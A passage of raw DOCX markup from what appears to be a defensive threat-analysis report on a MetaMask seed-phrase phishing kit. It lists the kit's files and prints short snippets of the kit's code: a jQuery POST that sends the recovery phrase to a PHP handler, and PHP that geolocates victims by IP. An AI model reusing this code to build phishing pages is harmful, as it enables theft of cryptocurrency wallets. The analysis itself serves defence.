              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask/metamask.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collection, enrichment, exfiltration, and storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>log/log.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retained 12-word recovery phrases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>log/.htaccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Apache access-control configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Supporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>images and CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Brand imitation and presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Supporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/*.ts and JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web3 and project source material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Contextual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.github and lint files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Development metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.DS_Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>macOS filesystem metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Contextual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Analyst Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The presence of legitimate libraries, images, and development files does not make every artifact malicious. The malicious conclusion is supported by the relationship between the recovery-phrase form, the PHP collection handler, Telegram transmission logic, and the local record store.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Victim Facing Phishing Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The wallet name first appeared as a directory clue, but the conclusion was validated through content visible to the victim and the client-side submission logic. The page title named MetaMask, the interface requested a 12-word phrase, and the form labeled the field as Wallet Seed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6144768" cy="3335424"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02-wallet-seed-phrase-evidence.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6144768" cy="3335424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigureCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 2  MetaMask branding, recovery-phrase request, and POST destination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Client Side Submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>$.post("../metamask.php", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  data1: "MetaMask",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  data: $(".import-account__secret-phrase").val()</w:t>
        <w:br/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This code established a direct data-flow path from the text area to the PHP handler. The HTML page acted as the social-engineering interface, while the PHP script performed server-side processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Backend Collection and Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The PHP handler received the phrase through POST data and combined it with server-provided request metadata. The source IP came from REMOTE_ADDR, while browser and operating-system information came from the HTTP User-Agent header.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88"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Data element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2088"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wallet type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded MetaMask label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Identify the impersonated service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2088"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovery phrase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST parameter data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary credential targeted by the kit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2088"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>REMOTE_ADDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Victim network identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2088"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>User-Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP_USER_AGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browser and operating-system context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2088"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Country and city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sypex Geo JSON response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Geolocation enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sypex Geo Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>$request = file_get_contents(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://api.sypexgeo.net/json/" . $_SERVER["REMOTE_ADDR"]</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:t>$array = json_decode($request);</w:t>
        <w:br/>
        <w:t>$country = $array-&gt;country-&gt;name_en;</w:t>
        <w:br/>
        <w:t>$city = $array-&gt;city-&gt;name_en;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The IP-geolocation request supports MITRE ATT&amp;CK T1614 System Location Discovery at a behavioral level because the kit used an online IP lookup service to infer the victim's geographical location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
